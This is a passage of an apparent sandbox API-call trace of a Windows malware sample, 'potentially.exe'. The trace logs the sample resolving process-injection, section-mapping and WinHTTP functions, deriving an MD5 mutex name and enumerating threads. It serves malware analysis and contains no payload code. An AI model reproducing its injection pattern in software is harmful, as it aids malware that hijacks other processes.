Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.850] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.981] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x210) returned 0x8c [0168.981] ResumeThread (hThread=0x8c) returned 0x1 [0168.981] CloseHandle (hObject=0x8c) returned 1 [0168.981] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c4) returned 0x8c [0168.981] ResumeThread (hThread=0x8c) returned 0x1 [0168.981] CloseHandle (hObject=0x8c) returned 1 [0169.008] CloseHandle (hObject=0x88) returned 1 [0169.008] VirtualQuery (in: lpAddress=0x780a28, lpBuffer=0x222fafc, dwLength=0x1c | out: lpBuffer=0x222fafc*(BaseAddress=0x780000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.008] GetProcessHeap () returned 0x760000 [0169.008] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x780a28 | out: hHeap=0x760000) returned 1 [0169.008] VirtualQuery (in: lpAddress=0x780918, lpBuffer=0x222fafc, dwLength=0x1c | out: lpBuffer=0x222fafc*(BaseAddress=0x780000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.008] GetProcessHeap () returned 0x760000 [0169.008] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x780918 | out: hHeap=0x760000) returned 1 [0169.008] RtlExitUserThread (Status=0x0) Process: id = "26" image_name = "potentially.exe" filename = "c:\\program files\\windows media player\\potentially.exe" page_root = "0x652d0000" os_pid = "0x310" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Media Player\\potentially.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 239 os_tid = 0x9c0 Thread: id = 240 os_tid = 0x178 Thread: id = 242 os_tid = 0x750 [0168.284] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0168.284] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0168.285] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0168.286] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0168.287] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0168.287] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0168.287] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0168.287] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0168.288] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0168.288] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0168.288] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0168.288] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0168.288] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0168.294] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0168.295] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0168.295] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0168.299] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0168.299] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0168.299] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0168.299] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0168.299] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0168.299] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0168.299] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0168.299] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0168.299] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0168.300] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0168.300] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0168.300] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0168.302] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0168.302] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0168.302] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0168.303] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0168.303] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0168.303] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0168.304] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0168.304] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0168.304] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x243fe20 | out: lpflOldProtect=0x243fe20*=0x40) returned 1 [0168.304] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x243fe20 | out: lpflOldProtect=0x243fe20*=0x4) returned 1 [0168.305] VirtualQuery (in: lpAddress=0x80016, lpBuffer=0x243fe18, dwLength=0x1c | out: lpBuffer=0x243fe18*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0168.305] GetProcessHeap () returned 0x6b0000 [0168.305] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x364) returned 0x6d0520 [0168.305] RtlMoveMemory (in: Destination=0x6d0520, Source=0x80016, Length=0x363 | out: Destination=0x6d0520) [0168.305] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0168.305] GetCurrentProcessId () returned 0x310 [0168.305] GetProcessHeap () returned 0x6b0000 [0168.305] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x105) returned 0x6d0890 [0168.305] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6d0890, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Media Player\\potentially.exe" (normalized: "c:\\program files\\windows media player\\potentially.exe")) returned 0x35 [0168.305] GetProcessHeap () returned 0x6b0000 [0168.305] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x105) returned 0x6d09a0 [0168.305] GetCurrentProcessId () returned 0x310 [0168.305] wsprintfA (in: param_1=0x6d09a0, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Media Player\\potentially.exe3708421247843") returned 66 [0168.305] CryptAcquireContextA (in: phProv=0x243fe1c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x243fe1c*=0x6d0af0) returned 1 [0168.440] CryptCreateHash (in: hProv=0x6d0af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x243fe20 | out: phHash=0x243fe20) returned 1 [0168.440] lstrlenA (lpString="C:\\Program Files\\Windows Media Player\\potentially.exe3708421247843") returned 66 [0168.440] CryptHashData (hHash=0x6d1410, pbData=0x6d09a0, dwDataLen=0x42, dwFlags=0x0) returned 1 [0168.440] CryptGetHashParam (in: hHash=0x6d1410, dwParam=0x2, pbData=0x243fe0c, pdwDataLen=0x243fe24, dwFlags=0x0 | out: pbData=0x243fe0c, pdwDataLen=0x243fe24) returned 1 [0168.440] wsprintfA (in: param_1=0x6d09a0, param_2="%02X" | out: param_1="5C") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09a2, param_2="%02X" | out: param_1="EC") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09a4, param_2="%02X" | out: param_1="8A") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09a6, param_2="%02X" | out: param_1="54") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09a8, param_2="%02X" | out: param_1="2C") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09aa, param_2="%02X" | out: param_1="3E") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09ac, param_2="%02X" | out: param_1="2E") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09ae, param_2="%02X" | out: param_1="66") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09b0, param_2="%02X" | out: param_1="F7") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09b2, param_2="%02X" | out: param_1="33") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09b4, param_2="%02X" | out: param_1="BD") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09b6, param_2="%02X" | out: param_1="26") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09b8, param_2="%02X" | out: param_1="15") returned 2 [0168.440] wsprintfA (in: param_1=0x6d09ba, param_2="%02X" | out: param_1="06") returned 2 [0168.441] wsprintfA (in: param_1=0x6d09bc, param_2="%02X" | out: param_1="C8") returned 2 [0168.441] wsprintfA (in: param_1=0x6d09be, param_2="%02X" | out: param_1="B1") returned 2 [0168.441] CryptDestroyHash (hHash=0x6d1410) returned 1 [0168.441] CryptReleaseContext (hProv=0x6d0af0, dwFlags=0x0) returned 1 [0168.441] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="5CEC8A542C3E2E66F733BD261506C8B1") returned 0x80 [0168.441] GetLastError () returned 0x0 [0168.441] Sleep (dwMilliseconds=0x1f4) [0169.079] GetCurrentProcessId () returned 0x310 [0169.079] GetCurrentThreadId () returned 0x750 [0169.079] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0169.081] Thread32First (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.082] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.082] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.082] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.083] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.083] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.083] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.083] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.084] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.084] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.084] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.084] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.085] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.085] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.085] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.086] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.086] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.086] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.086] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.087] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.087] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.087] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.088] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.088] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.088] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.088] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.089] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.089] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.089] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.089] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.090] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.090] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.090] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.091] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.091] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.091] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.091] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.092] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.092] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.092] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.093] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.093] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.093] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.093] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.094] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.094] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.094] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.094] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.095] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.095] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.095] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.096] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.096] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.096] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.096] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.097] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.097] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.097] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.098] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.098] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.098] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.098] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.099] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.099] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.099] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.099] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.100] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.100] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.100] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.101] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.101] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.101] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.101] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.102] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.102] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.102] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.103] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.103] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.103] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.103] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.104] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.104] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.104] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.104] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.105] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.105] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.105] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.106] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.106] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.106] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.106] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.107] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.107] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.107] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.108] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.108] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.108] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.108] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.109] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.109] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.109] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.109] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.110] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.110] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.110] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.111] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.111] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.111] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.111] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.112] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.112] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.112] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.237] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.238] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.238] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.238] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.239] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.239] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.239] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.239] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.240] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.240] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.240] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.241] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.241] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.241] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.241] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.242] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.242] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.242] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.242] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.243] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.243] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.243] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.244] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.244] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.244] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.244] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.245] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.245] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.245] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.246] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.246] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.246] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.246] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.247] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.247] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.247] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.247] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.248] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.248] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.248] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.249] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.249] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.249] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.249] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.250] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.250] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.250] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.250] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.251] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.251] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.251] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.252] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.252] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.252] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.252] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.253] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.253] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.253] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.254] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.254] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.254] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.255] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.255] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.255] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.255] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.256] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.256] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.256] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.257] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.257] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.257] Thread32Next (hSnapshot=0x88, lpte=0x243fe10) returned 1 [0169.257] 